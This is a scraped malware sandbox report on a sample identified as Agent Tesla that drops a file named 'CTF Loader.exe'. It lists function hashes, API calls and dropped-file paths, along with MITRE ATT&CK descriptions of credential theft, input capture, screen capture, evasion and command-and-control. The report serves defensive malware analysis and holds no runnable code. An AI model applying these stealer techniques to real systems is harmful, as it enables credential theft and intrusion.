Snapshot File: hcaresult_4_2_a1d000_CTF Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbfdf0fe68ecc8b5089c126f1e4b313e7b7d8bb321e8f4ec13395a46bed43a5a
Instruction ID: 197c1e6ee458fea9045290ba88dc0396c3c66fe13ce623927ea44ce953f85ad1
Opcode Fuzzy Hash: dbfdf0fe68ecc8b5089c126f1e4b313e7b7d8bb321e8f4ec13395a46bed43a5a
Instruction Fuzzy Hash: 984264A194F3C11FE313473419B91987F708D5310872E8ADBD8DACA8A3E41E5A1FD766

Function 00A1E4E4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4112832763.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a1d000_CTF Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7cc1504aac210dbe376f9f95c128f8b06b88a0974fc7716ab4617127143f14b
Instruction ID: 9f5178f576c2fd20474b4e5b6cd8619e436a6a5ba109ce863fd5ca7eb66bac9a
Opcode Fuzzy Hash: e7cc1504aac210dbe376f9f95c128f8b06b88a0974fc7716ab4617127143f14b
Instruction Fuzzy Hash: C3212671504240DFCB04DF14D584B66BBA6FB84328F24C569EC094B256D336D886CAA1

Function 00A1E31C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4112832763.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a1d000_CTF Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92c08124d46965a26127efe2fc21df98492838c785ec41ebbcb6031087fac8b7
Instruction ID: 6d0f13660d2114fd344708acb4d776578d1df99b9c5dd1ec75ca8f92bcc29a59
Opcode Fuzzy Hash: 92c08124d46965a26127efe2fc21df98492838c785ec41ebbcb6031087fac8b7
Instruction Fuzzy Hash: 42210475504200EFDB04DF14D5C4B66BBA5FB84314F24C56DEC4A4F296C33AD886CA61

Function 00A1E4DF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4112832763.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a1d000_CTF Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction ID: 0969423ebe975087e8555a9b4a6097b1dfc2e162139cb6004c01a518afd3eaaa
Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction Fuzzy Hash: DB119076504280CFDB11CF14D5C4B55BF62FB84328F28C6AADC494B656C33AD85ACB91

Analysis Process: CTF Loader.exePID: 3716, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	95.7%
Signature Coverage:	0%
Total number of Nodes:	69
Total number of Limit Nodes:	5

Executed Functions

Function 06C92268 Relevance: 6.2, APIs: 4, Instructions: 187
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06C9235E
GetCurrentThread.KERNEL32 ref: 06C9239B
GetCurrentProcess.KERNEL32 ref: 06C923D8
GetCurrentThreadId.KERNEL32 ref: 06C92431

Memory Dump Source

Source File: 00000005.00000002.2117657493.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c90000_CTF Loader.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 2058f76d9720f072d5cc2d963072766475912dc48fe77aaa9549fc4bbf7b1ac1
Instruction ID: 445545c1539f3a1d56b283008bcd5d48708536c5eb73fc9c380bfb0b85264ea0
Opcode Fuzzy Hash: 2058f76d9720f072d5cc2d963072766475912dc48fe77aaa9549fc4bbf7b1ac1
Instruction Fuzzy Hash: 7871CFB08053898FCB15DFB9C9487DEBFF1EF4A304F14809AD084AB2A1D7785949CB65

Function 06C922E0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06C9235E
GetCurrentThread.KERNEL32 ref: 06C9239B
GetCurrentProcess.KERNEL32 ref: 06C923D8
GetCurrentThreadId.KERNEL32 ref: 06C92431

Memory Dump Source

Source File: 00000005.00000002.2117657493.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c90000_CTF Loader.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e84ba2c7b53e6244dfc260d91a23a0ff66d936cf6a02a64ad9f27d00cfadd2c3
Instruction ID: 6a5139f14c5883f571c520d738142471524723c19c4572ead3e1b7ba2ae6e034
Opcode Fuzzy Hash: e84ba2c7b53e6244dfc260d91a23a0ff66d936cf6a02a64ad9f27d00cfadd2c3
Instruction Fuzzy Hash: A35154B091020ADFDB54DFA9D948B9EBBF5FB48304F20C169E059A7360DB389984CF65

Function 0172E7ED Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0172E90A

Memory Dump Source

Source File: 00000005.00000002.2116101010.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1720000_CTF Loader.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: bcfc2e825e79e1e2432d76ff9887e97a5fc17a53f17b2c43145aca27f896491b
Instruction ID: 7187a70b16cd73960104143bfe13f0f7886b12b50d73b4c54c7fc2e3dc36df57
Opcode Fuzzy Hash: bcfc2e825e79e1e2432d76ff9887e97a5fc17a53f17b2c43145aca27f896491b
Instruction Fuzzy Hash: AF5190B1D003199FDB14CF99C984ADEFBB5FF48310F24812AE459AB210DB759946CF91

Function 0172D59C Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0172E90A

Memory Dump Source

Source File: 00000005.00000002.2116101010.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1720000_CTF Loader.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9cd31bf1d9255c4eb216eb16957f97aec5dcd3de4eba5cd9e61ffeeb66d128a0
Instruction ID: abc7bb0b8b2778a3f7b6e07d653af28abff70c98e701aea0619af6bad03433b6
Opcode Fuzzy Hash: 9cd31bf1d9255c4eb216eb16957f97aec5dcd3de4eba5cd9e61ffeeb66d128a0
Instruction Fuzzy Hash: 54519FB1D003199FDB14CF9AC984ADEFBB5FF48310F24812AE859AB210DB719945CF91

Function 06C9201C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06C93411

Memory Dump Source

Source File: 00000005.00000002.2117657493.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c90000_CTF Loader.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 7a784afa07eb8839d51dc148c8f94c6076e1b3826451fc88a0e042f4f37dc58a
Instruction ID: 1787a960f9344d4c216c389d15cb1cb77ccf245535c46e5420d28b10c25dd209
Opcode Fuzzy Hash: 7a784afa07eb8839d51dc148c8f94c6076e1b3826451fc88a0e042f4f37dc58a
Instruction Fuzzy Hash: 894125B4A00349CFDB54CF99C488AAAFBF5FB88314F24C459E519AB321D771A941CFA0

Function 06C91EB8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06C924EE,?,?,?,?,?), ref: 06C925AF

Memory Dump Source

Source File: 00000005.00000002.2117657493.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c90000_CTF Loader.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 28c0f7a1d391afe7a3c6565f3a6154612d62fc47540a7083d25d5b827f0553a8
Instruction ID: 673f7a52c650b5b16d9ff73e4e64c650038183cb9e5a5555901cbecd0576b4b0
Opcode Fuzzy Hash: 28c0f7a1d391afe7a3c6565f3a6154612d62fc47540a7083d25d5b827f0553a8
Instruction Fuzzy Hash: CD21E4B5900248EFDB10CF9AD984ADEFFF5EB48310F14801AE954A7350D378AA50CFA5

Function 06C92520 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06C924EE,?,?,?,?,?), ref: 06C925AF

Memory Dump Source

Source File: 00000005.00000002.2117657493.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c90000_CTF Loader.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7a7a07af309760bf65fa7e03dd18ae722a23c99aad9f10365d832bef30daaae0
Instruction ID: 13883071efb1f04a1cb04ec76a19024d1247faa3936a7199861634d0124930d8
Opcode Fuzzy Hash: 7a7a07af309760bf65fa7e03dd18ae722a23c99aad9f10365d832bef30daaae0
Instruction Fuzzy Hash: 182103B59002089FDB10CFA9D984AEEBFF5FB48310F14801AE858A7310D338AA44CFA1

Function 0139D954 Relevance: 1.2, Instructions: 1160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2115437827.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_139d000_CTF Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 967c3d3151e05b8876c4645872d1d29b4e209f430c9f9340593fdaa5ee6b2df7
Instruction ID: c0e0d7fa3325e31e2645c245336856abdd137713831d876eb247296706595063
Opcode Fuzzy Hash: 967c3d3151e05b8876c4645872d1d29b4e209f430c9f9340593fdaa5ee6b2df7
Instruction Fuzzy Hash: 3452E97640E3C19FC7034B748C65692BFB0AF6321471E42EBD884DF4A7D229495AEB63

Function 0139D974 Relevance: 1.1, Instructions: 1081COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2115437827.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_139d000_CTF Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17af048297c06cdfe8dc09e11b993e3903b847337646bd1e7e89de303d6b156b
Instruction ID: 3a2d7361a39376efaa320219e37734c507c4f7ec773bccf3a001768fe0db2fb4
Opcode Fuzzy Hash: 17af048297c06cdfe8dc09e11b993e3903b847337646bd1e7e89de303d6b156b
Instruction Fuzzy Hash: 3742E47640E3C19FCB034B748C666927FB1AF6321871E41E7D884DF4A7D22D495AEB22

Function 0139DA60 Relevance: 1.0, Instructions: 999COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2115437827.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_139d000_CTF Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c705bc4462387745893d344cce691d407c6439d0ab1358278fc31bb80c9bd28c
Instruction ID: aef1c34f777f209e8dd6ddb93780c9852dbdd358d94c111e208318c47550d7aa
Opcode Fuzzy Hash: c705bc4462387745893d344cce691d407c6439d0ab1358278fc31bb80c9bd28c
Instruction Fuzzy Hash: 1832E57640E3C19FCB034B748D666927FB0AF6321871E41E7D884DF4A7D22D495AEB22

Function 0139E31C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2115437827.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_139d000_CTF Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a26509921a6b37cfdcf081e7159c966506f3874ed66f2e63d46f968d57e231
Instruction ID: fde22c2c82b6172cc5aea90876f6715279c090390a8b642a8b06e11edbac1bbc
Opcode Fuzzy Hash: 10a26509921a6b37cfdcf081e7159c966506f3874ed66f2e63d46f968d57e231
Instruction Fuzzy Hash: DE21F271604204EFDF05DF28D5C4B26BBA5FB84318F24C57DE94A4B296C33AD846CA61

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ZOYGRL1ePa.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\ScreenShot\screen.jpeg

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
ZOYGRL1ePa.exe

Function 06E799E8 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 417
libraryCOMMON

Function 0132E0C8 Relevance: 2.8, Strings: 2, Instructions: 307
COMMON

Function 0132E120 Relevance: 2.8, Strings: 2, Instructions: 266
COMMON

Function 0132E148 Relevance: 2.7, Strings: 2, Instructions: 249
COMMON

Function 0132E1A8 Relevance: 2.7, Strings: 2, Instructions: 208
COMMON

Function 0132E1C8 Relevance: 2.7, Strings: 2, Instructions: 193
COMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre